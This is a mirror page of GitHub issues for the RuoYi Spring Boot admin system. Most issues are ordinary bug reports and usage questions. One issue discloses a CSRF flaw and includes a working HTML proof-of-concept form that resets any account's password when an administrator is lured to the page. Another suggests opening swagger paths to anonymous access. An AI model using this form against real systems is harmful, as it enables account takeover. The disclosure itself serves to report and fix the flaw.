Giter Club home page Giter Club logo

yangzongzhuan / ruoyi Goto Github PK

View Code? Open in Web Editor NEW
5.3K 5.3K 1.7K 11.48 MB

:tada: (RuoYi)官方仓库 基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用

Home Page: http://ruoyi.vip

License: MIT License

Batchfile 0.05% Java 23.82% JavaScript 33.68% CSS 6.40% HTML 36.01% Shell 0.04%
activiti bootstrap bootstrap-table druid hplus hutool java jquery layer layui mybatis mybatisplus pagehelper quartz shiro spring springboot swagger thymeleaf velocity

ruoyi's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

ruoyi's Issues

There is CSRF, which can change any account password

As shown in the figure below, there is user management function
image
When constructing the following malicious page

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="localhost/system/user/resetPwd" method="POST">
      <input type="hidden" name="userId" value="1" />
      <input type="hidden" name="loginName" value="test" />
      <input type="hidden" name="password" value="12345678" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When the administrator is induced to visit the page, any account password can be reset

关于路由添加

请问如果我想在菜单管理页面添加一个主类目的按钮,也就是左侧菜单点击直接出来个页面,需要怎么设置呢?我按照别的子组件来设置貌似不对!它打开了一个全新的页面!
WX20191125-155117@2x

首页重复使用thymeleaf内联方式[[]]直接获取系统默认主题,未能体现浏览器缓存判断

在htymeleaf里面使用内联方式[[]],在页面初始化的时候都会预编译,所以说每次在刷新页面的时候,不管以下的判断怎么处理,thymeleaf都会根据[[]]里的处理去调用后台方法获取系统主题,这样也占用资源消耗,也体现不出local storage本地缓存的多大作用。
image
建议在这里不要用这种内联方式加载后台方法获取属性,直接用ajax请求略佳
image

定时任务日志显示问题

现在定时任务的日志消息里只是记录了一个task总共耗时了多少毫秒,能将task里输出的一些log也记录在job_message里吗?这样前台定时任务的日志管理里也能更好的看到task的运行详细情况。

swagger using IP access will cause /csrf 404

From what I could figure out from the source code of swagger-ui it can work without those endpoints. Basically it uses the base url to search in the html for a csrf meta information or if that fails it checks an endpoint /csrf to check for csrf token. As last the cookies are checked if some contains the XSRF-TOKEN value

solution:

  1. Shiroconfig file release permission
    filterChainDefinitionMap.put("/swagger-ui.html", "anon");<br/> filterChainDefinitionMap.put("/swagger-resources/**", "anon");<br/> filterChainDefinitionMap.put("/v2/**", "anon");<br/> filterChainDefinitionMap.put("/webjars/**", "anon");

  2. Reduce swagger to 2.8.0

  3. Add cross domain lifter

  4. Modify the swagger configuration of ResourcesConfig
    registry.addResourceHandler("swagger-ui.html").addResourceLocations("classpath:/META-INF/resources/swagger-ui.html");

在service上自己list组装数据时,没有分页

在service层,如:
List list =new ArrayList<>();
list.add(user1);
list.add(user2);
return list;
在controll层,写:
startPage();
List lists=userService.selectUserList(Vo); (在这一步,没有分页处理)
getDataTable(list);

解析spring.datasource.druid.initialSize失败

在windows打包成jar包后,在linux环境运行java -jar 报如下错误,确认initialSize有配置

Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.
16:35:33.877 [main] ERROR o.s.b.SpringApplication - [reportFailure,858] - Application run failed
org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'shiroFilterFactoryBean' defined in class path resource [com/ruoyi/framework/config/ShiroConfig.class]: BeanPostProcessor before instantiation of bean failed; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'authorizationAttributeSourceAdvisor' defined in class path resource [com/ruoyi/framework/config/ShiroConfig.class]: Unsatisfied dependency expressed through method 'authorizationAttributeSourceAdvisor' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'securityManager' defined in class path resource [com/ruoyi/framework/config/ShiroConfig.class]: Unsatisfied dependency expressed through method 'securityManager' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'userRealm': Unsatisfied dependency expressed through field 'menuService'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'menuServiceImpl': Unsatisfied dependency expressed through field 'menuMapper'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'menuMapper' defined in URL [jar:file:/data/htdocs/java/sit.jar!/BOOT-INF/classes!/com/ruoyi/project/system/menu/mapper/MenuMapper.class]: Unsatisfied dependency expressed through bean property 'sqlSessionFactory'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'sqlSessionFactory' defined in class path resource [org/mybatis/spring/boot/autoconfigure/MybatisAutoConfiguration.class]: Unsatisfied dependency expressed through method 'sqlSessionFactory' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'dynamicDataSource' defined in class path resource [com/ruoyi/framework/config/DruidConfig.class]: Unsatisfied dependency expressed through method 'dataSource' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'masterDataSource' defined in class path resource [com/ruoyi/framework/config/DruidConfig.class]: Unsatisfied dependency expressed through method 'masterDataSource' parameter 0; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'druidProperties': Injection of autowired dependencies failed; nested exception is java.lang.IllegalArgumentException: Could not resolve placeholder 'spring.datasource.druid.initialSize' in value "${spring.datasource.druid.initialSize}"
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:493)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:320)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:222)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:318)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:204)
at org.springframework.context.support.PostProcessorRegistrationDelegate.registerBeanPostProcessors(PostProcessorRegistrationDelegate.java:240)
at org.springframework.context.support.AbstractApplicationContext.registerBeanPostProcessors(AbstractApplicationContext.java:707)
at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:531)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:142)
at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:775)
at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:397)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:316)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1260)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1248)
at com.ruoyi.RuoYiApplication.main(RuoYiApplication.java:18)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.boot.loader.MainMethodRunner.run(MainMethodRunner.java:48)
at org.springframework.boot.loader.Launcher.launch(Launcher.java:87)
at org.springframework.boot.loader.Launcher.launch(Launcher.java:50)
at org.springframework.boot.loader.JarLauncher.main(JarLauncher.java:51)

editable开启行内编辑

1、开启editable编辑,如果是金额格式成333,333,333。再回显应该现实原始,不应该是格式化的值。如果是格式化的金额无法提交

首页重叠

实例按钮---- 表单 --- 选择 -弹出404 点首页,会和原来首页重叠

缩放菜单卡顿

当前端页面数据量大时,如登录日志,当一页显示50条时就已经产生卡顿感,数据量更大时卡顿明显

注册的问题

注册功能提交时input框name为username 但提交的时候是logName接收, 但都是只提交了一个名字, 由于数据库设置两者均不能为空,也没有默认值,故会报错.

注册逻辑

能说下注册的逻辑吗?为什么注册会走缓存,sys_config:sys.account.registerUser这个key里面存的是什么?

生成代码

生成代码的时候 能不能加个指定类型的

image

还有 后台 字段信息 java类型 没有 Boolean类型

image

生成代码,报模板错误

Lexical error, Encountered: after : "" at vm/vue/index.vue.vm[line 515, column 0]
org.apache.velocity.exception.ParseErrorException: Lexical error, Encountered: after : "" at vm/vue/index.vue.vm[line 515, column 0]
下面是我的数据库字段表
image
再页面上点击会出现如下的错误
哪里出错了呢?
image

数据权限问题

一个用户有多个角色,每个角色的数据权限都不一样,这时候dataScopeFilter方法中会读取到2个不同的role的datascope,造成使用混乱

例如新建了2个角色,菜单权限不同,2个角色中包含了同一个人,数据权限都是仅限本人。这时候sql中会出现AND (u.user_id = 2 OR u.user_id = 2 ) 拼装了2次,这个算问题吗?

很赞!

文档清晰,笔录也很棒,虽然都是一些基础问题,但是都是很多人容易犯的。作者很用心。给个赞!

正常运行,登录后台,显示jwt:null

按照文档配置好,正常运行后,无法登录后台,显示如下信息,是什么原因?
6:55:27.859 [http-nio-8081-exec-14] INFO c.r.f.s.w.f.BJwtFilter - [getToken,93] - jwt:null

关于多数据源的坑

在开发过程中发现,即使配置了使用多数据源,但是依然报错。日志打印切换了数据源,但实际还是用的原数据源。最后发现是方法注释了@transaction导致了出错。最终将事务注释去掉就没问题了。
举例:
A(),注释使用数据源Slave。
B() { A() },注释了@transaction。最终导致内部的A还是用了数据源Master,没用Slave。将B方法上的事务去掉就OK了。

希望在多数据源的文档里说明这种情况,避免其他兄弟踩坑。

用户查询大问题

当我一个用户有4个角色 ,我用户集合有8条 这样我left join 角色表会查出11条 进行了分页 ,恰好那有四个角色的用户查询在上面 那么我userList的不会出现8条数据,只有7条,因为分页了下个用户在下一页,那个用户有三个角色的映射到了用户的roles里面了

导出多个sheet页报表

请问一下,如果我想多出多个sheet页的报表应该怎么实现?sheet也的字段不一样

父子表的checkbox怎么解决联动问题?

请问若依 使用bootstrapTable父子表的时候,子表已经成功显示在父表中,但父表上的checkbox无法选择到子表中的数据,父子表的checkbox怎么解决联动问题?

1.选择父表checkbox 子表全选 子表如果没有全选中 父表不选中
1.包括父表全选的时候 子表也联动全选 子表不全选中时 父表不选中 父表全选也不选中
请大神帮忙

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.